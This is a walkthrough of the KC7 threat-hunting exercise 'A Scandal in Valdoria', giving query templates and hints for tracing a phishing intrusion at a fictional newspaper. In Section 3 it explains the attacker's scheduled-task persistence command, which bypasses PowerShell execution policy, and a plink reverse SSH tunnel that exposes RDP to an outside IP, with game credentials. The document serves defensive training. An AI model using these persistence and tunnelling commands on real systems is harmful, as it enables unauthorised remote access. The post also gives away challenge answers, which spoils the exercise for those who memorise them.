KC7 A Scandal in Valdoria!

May 22, 2024 · Last Modified: June 14, 2024 · 12 min · 2467 words · Bader Alrowaiei

Table of Contents

Section 2: Welcome to Valdoria!
Section 3: Plenty of Phish
Section 4: A Scandal
Community Help

This post is a write-up or clues on how to resolve the KC7 investigation case of A Scandal in Valdoria . You can use it as a helpful guide when you encounter an obstacle, as it structured as a fill-in-the-blanks solution.

Section 2: Welcome to Valdoria!

Question 1: What is the Newspaper Printer’s name?

Clark Kent

Question 2: What is the Editorial Intern’s name?

Employees
| where <field> == "Editorial Intern"

Question 3: When was the Editorial Intern hired at The Valdorian Times?

Answer from question 2.

Employees
| where <field> == "Editorial Intern"

Question 4: How many total emails has Clark Kent received?

Find Kent’s email address

Employees
| where <field> <operator> "Clark Kent"

Get the count of emails.

Email
| where <field> <operator> "<Clark Kent Email address>"
| <operator>

Question 5: What was the subject line of this email?

Question 6: Enter the sender’s email address.

This query will provide the required data to continue the investigation by answering questions 5 and 6. Use the query from question 4 without the last operator count 🫣. The question provided us with the date when the email was sent to Clark Kent on January 31, 2024.

Email
| where <field> <operator> "<Clark Kent Email address>"
| where timestamp between (datetime('2024-01-31T00:00:00Z') ..datetime('2024-01-31T23:59:59') )

Question 7: What was the name of the .docx file that was sent in this email?

Use the same query above to answer this question. It is asking for the file name not the full link.

Question 8: Do you think this needs further investigation (yes/no)? Choose wisely 😉

Yes

Section 3: Plenty of Phish

Question 1: What is Sonia’s job role?

Table
| where <field> <operator> "Sonia Gose"

Question 2: What email address was used to send this email?

Type the email address newspaper_jobs@gmail.com.

Question 3: When was the email sent to Sonia Gose? Enter the exact timestamp from the logs.

The sender’s email address was provided to us in question number 2. Also, we have Sonia Gose from the Employee table.

Table
| where <field> <operator> "newspaper_jobs@gmail.com"
| where <field> <operator> <"Sonia Gose Email">

Question 4: What URL was included in the email?

Answer from question 3.

Question 5: What is Sonia Gose’s IP address?

Answer from question 1.

Table
| where <field> <operator> "Sonia Gose"

Question 6: Did Sonia click on this link? If so, enter the timestamp when she clicked the link. If not, type “no”

Table
| where <field> <operator> <Sonia Gose's IP address>
and <field> <operator> <URL> //Q4

Question 7: What was the name of the docx file in link that Sonia clicked?

Just the file name not the full link in the answer to question 4.

Table
| where <field> <operator> "newspaper_jobs@gmail.com"
| where <field> <operator> <"Sonia Gose Email">

Question 8: What is Sonia Gose’s hostname?

Table
| where <field> <operator> "Sonia Gose"

Question 9: When did the downloaded docx file first show up on Sonia’s machine?

Table
| where <field> <operator> <"Sonia Gose's hostname">
| where <field> <operator> <"File Name"> //Q7

Question 10: What was the full path of the docx file that was downloaded to Sonia’s machine?

Answer from question 9.

Table
| where <field> <operator> <"Sonia Gose's hostname">
| where <field> <operator> <"File Name"> //Q7

Question 11: What is the sha256 hash of the file that Sonia downloaded?

Answer from question 9.

Table
| where <field> <operator> <"Sonia Gose's hostname">
| where <field> <operator> <"File Name"> //Q7

Question 12: What is the name of the file (.ps1) that was written to disk immediately after the docx was downloaded?

Only the file name.

Table
| where <field> <operator> "<Sonia Gose's Hostname>"
| where timestamp > datetime(2024-01-05 10:24:04.000) //timestamp after the event

Question 13: When was this new file created?

Timestamp from answer to question 12.

Table
| where <field> <operator> "<Sonia Gose's Hostname>"
| where timestamp > datetime(2024-01-05 10:24:04.000)

Question 14: Let’s do some research! What type of file is this?

Use your Google-Fu skills!

Question 15: What does the attacker say to “let you know they are here”?

Lol! Do you see it 😄.

Question 16: According to the PowerShell script, what might be the hacker’s favorite color?

It is in the image from question 15.

Question 17: The purpose of the script is to invoke ____ and uncover da truth

It is in the image from question 15.

Table
| where <field> <operator> "<Sonia Gose's Hostname>"
| where <field> <operator> "hacktivist_manifesto.ps1"
| count

Question 19: What is the full command used to create the scheduled task?

From question 18. Do you see it? It is in task scheduler.

Table
| where <field> <operator> "<Sonia Gose's Hostname>"
| where <field> <operator> "hacktivist_manifesto.ps1"

Question 20: What ExecutionPolicy is set in the command?

The policy will allow the script to run without restrictions.

This PowerShell command is using schtasks to create a scheduled task in Windows. Here is a breakdown of the command and what each part does:
schtasks: This is a command-line tool in Windows used to create, delete, query, change, run, and end scheduled tasks on a local or remote computer.
/create: This flag tells schtasks that you want to create a new scheduled task.
/sc hourly: This parameter specifies the schedule type for the task. In this case, hourly indicates that the task should run every hour.
/mo 5: This modifies the schedule set by /sc. Here, it means the task will run every 5 hours.
/tn "Hacktivist Manifesto": This sets the name of the task. The task will be identified in the Task Scheduler as “Hacktivist Manifesto”.
/tr "powershell.exe -ExecutionPolicy Bypass -File C:\ProgramData\hacktivist_manifesto.ps1": This sets the action that the task will execute. Here, it runs powershell.exe with the specified parameters:
-ExecutionPolicy Bypass: This bypasses the PowerShell execution policy, allowing the script to run without restrictions.
-File C:\ProgramData\hacktivist_manifesto.ps1: This specifies the path to the PowerShell script that should be executed.
In summary, this command creates a scheduled task named “Hacktivist Manifesto” that runs a PowerShell script located at C:\ProgramData\hacktivist_manifesto.ps1 every 5 hours, bypassing any execution policy restrictions.

Question 21: What IP address is used when plink is executed?

ProcessEvents
| where <field> <operator> "<Sonia Gose's Hostname>"
| where <field> <operator> "plink.exe"

The plink.exe is a command-line interface to the PuTTY back ends.

plink.exe: This is the command-line interface to the PuTTY SSH client.
-R 3389:localhost:3389: This sets up a reverse SSH tunnel. Here’s what each part means:
-R: This specifies a reverse tunnel.
3389:localhost:3389: This maps port 3389 on the remote machine to port 3389 on the local machine. Port 3389 is commonly used for Remote Desktop Protocol (RDP).
-ssh: This tells plink.exe to use the SSH protocol for the connection.
-l $had0w: This specifies the username to log in as on the remote machine. In this case, $had0w.
-pw thruthW!llS3tUfree: This specifies the password for the user $had0w.
136.130.190.181: This is the IP address of the remote machine to which you are connecting.

This command sets up a reverse SSH tunnel from the local machine to the remote machine at IP address 136.130.190.181 using the username $had0w** and the password thruthW!llS3tUfree. It maps port 3389 on the remote machine to port 3389 on the local machine. This allows you to connect to the Remote Desktop service on the local machine via the remote machine’s IP address and port 3389. Essentially, you can use this to remotely access the local machine’s desktop environment through the remote machine.

Question 22: What username did the attacker use when connecting via plink?

Answer from question 21.

Question 23: What password did the attacker use when connecting via plink?

Answer from question 21.

Question 24: What six-letter command did the attackers run to figure out which user they are logged on as on the computer?

The timestamp from answer question 21.

ProcessEvents
| where hostname == "<Sonia Gose's Hostname>"
| where timestamp >= datetime(2024-01-06 02:39:35)

Question 25: How many discovery commands did the attackers run on this machine?

Answer from question 24. Check MITRE ATT&CK ID: T1018

Question 26: Do you think we can safely stop our investigation here? (yes/no)

🤔

Section 4: A Scandal

Question 1: How many total emails were sent by this email sender to users at The Valdorian Times?

Table
| where <field> <operator> "valdorias_best_recruiter@gmail.com"
| count

Question 2: When did `valdorias_best_recruiter@gmail.com` send an email to Ronnie McLovin?

KC7 A Scandal in Valdoria - Section 2: Welcome to Valdoria! Question 6. . Also, we can find the email address of Ronnie McLovin by checking the Employees table.

Table
| where <field> <operator> "valdorias_best_recruiter@gmail.com"
| where <field> <operator> "<Email from Section 2 Question 6>"

Question 3: What domain was in the link from that email?

Table
| where <field> <operator> "valdorias_best_recruiter@gmail.com"
| where <field> <operator> "<Email from Section 2 Question 6>"

KC7 A Scandal in Valdoria - Section 2: Welcome to Valdoria! Question 6. .

Question 4: What was the subject of that email?

Table
| where <field> <operator> "valdorias_best_recruiter@gmail.com"
| where <field> <operator> "<Email from Section 2 Question 6>"

KC7 A Scandal in Valdoria - Section 2: Welcome to Valdoria! Question 6. .

Question 5: When did Ronnie click on the link in the email from valdorias_best_recruiter@gmail.com ?

We know the domain of the phishing website from question 3. To narrow our search, we will run the following query:

search "<Answer from question 3>"
| distinct $table

The results are in tables Email and OutboundNetworkEvents. After reviewing the columns in both tables, we can identify column src_ip in the OutboundNetworkEvents table. Then, from the Employees table, we can find Donnie McLovin’s IP address by running the following:

Table
| where <field> <operator> "Ronnie McLovin"

Then, search for Ronnie McLovin’s IP address in the src_ip and link in url columns.

Table
| where <field> <operator> "<Ronnie McLovin's ip_addr>" and url contains "<Answer from question 3>"

Question 6: What was the name of the .docx file that was downloaded to Ronnie’s machine?

Answer from question 5.

Question 7: When was this docx file downloaded?

Start looking at the available tables and columns in the ValdyTime database. We need to get the query using the hostname or username, which we can obtain from the Employees table.

Employees
| where <field> <operator> "Ronnie McLovin"

Table
| where <field> <operator> "<Ronnie's Hostname>"
| where <field> <operator> "Editorial_J0b_Openings_2024.docx"

Question 8: When was the .ps1 file dropped to Ronnie’s machine?

Table
| where <field> <operator> "<Ronnie's Hostname>"
| where <field> <operator> "hacktivist_manifesto.ps1"

KC7 A Scandal in Valdoria - Section 3: Plenty of Phish Question 12.

Question 9: What IP address was used with plink on Ronnie’s machine?

Table
| where <field> <operator> "<Ronnie's Hostname>"
| where <field> <operator> "plink"

Question 10: What username was used with plink on Ronnie’s machine?

Answer from question 9 in the process_commandline column.

Table
| where <field> <operator> "<Ronnie's Hostname>"
| where <field> <operator> "plink"

Question 11: What password was used with plink on Ronnie’s machine?

Answer from question 9 in the process_commandline column.

Table
| where <field> <operator> "<Ronnie's Hostname>"
| where <field> <operator> "plink"

Question 12: How many discovery commands were run on Ronnie’s machine?

Check MITRE ATT&CK ID: T1018 I used the timestamp >= with datetime (2024-01-10T08:55:51Z), which is the time of running the file C:\ProgramData\hacktivist_manifesto.ps1.

Table
| where <field> <operator> "<Ronnie's Hostname>"
| where timestamp >= datetime(2024-01-10T08:55:51Z)

Question 13: What is Ronnie’s IP address?

We saw that in the Employees table.

Table
| where <field> <operator> "Ronnie McLovin"

Question 14: What is the full URL fakestory.docx was downloaded from?

Table
| where <field> <operator> "fakestory.docx"

Question 15: What is Ronnie’s hostname?

Table
| where <field> <operator> "fakestory.docx"

Question 16: What is the sha256 hash of fakestory.docx on Ronnie’s machine?

Table
| where <field> <operator> "fakestory.docx"

Question 17: When was fakestory.docx created on Ronnie’s machine?

Table
| where <field> <operator> "fakestory.docx"

Question 18: What is the new path for the document?

The question provided us with the file that was downloaded: fakestory.docx. Let’s perform a search for the file name.

search "fakestory.docx"

Our flag is in the process_commandline.

Other ways to get our flag would be to check the timeline after discovery commands or use the hostname and the filename to find the command.

Question 19: When was this command executed to rename and move the file?

Answer from question 18.

Question 20: When was OpEdFinal_to_print.docx emailed from Ronnie’s account to Clark Kent?

Table
| where <field> <operator> "OpEdFinal_to_print.docx"

Question 21: How many minutes elapsed between when the file was moved/renamed on Ronnie machine and when the email was sent to Clark Kent?

Perform a time calculation for the events timestamp from question 19 and question 20.

Question 22: What was the subject line of this email?

Table
| where <field> <operator> "OpEdFinal_to_print.docx"

Question 23: Do you think this is the only thing the attackers did on Ronnie’s machine? (yes/no)

It wouldn’t be fun if it was yes!

Question 24: What is the domain mentioned in this alert?

In red!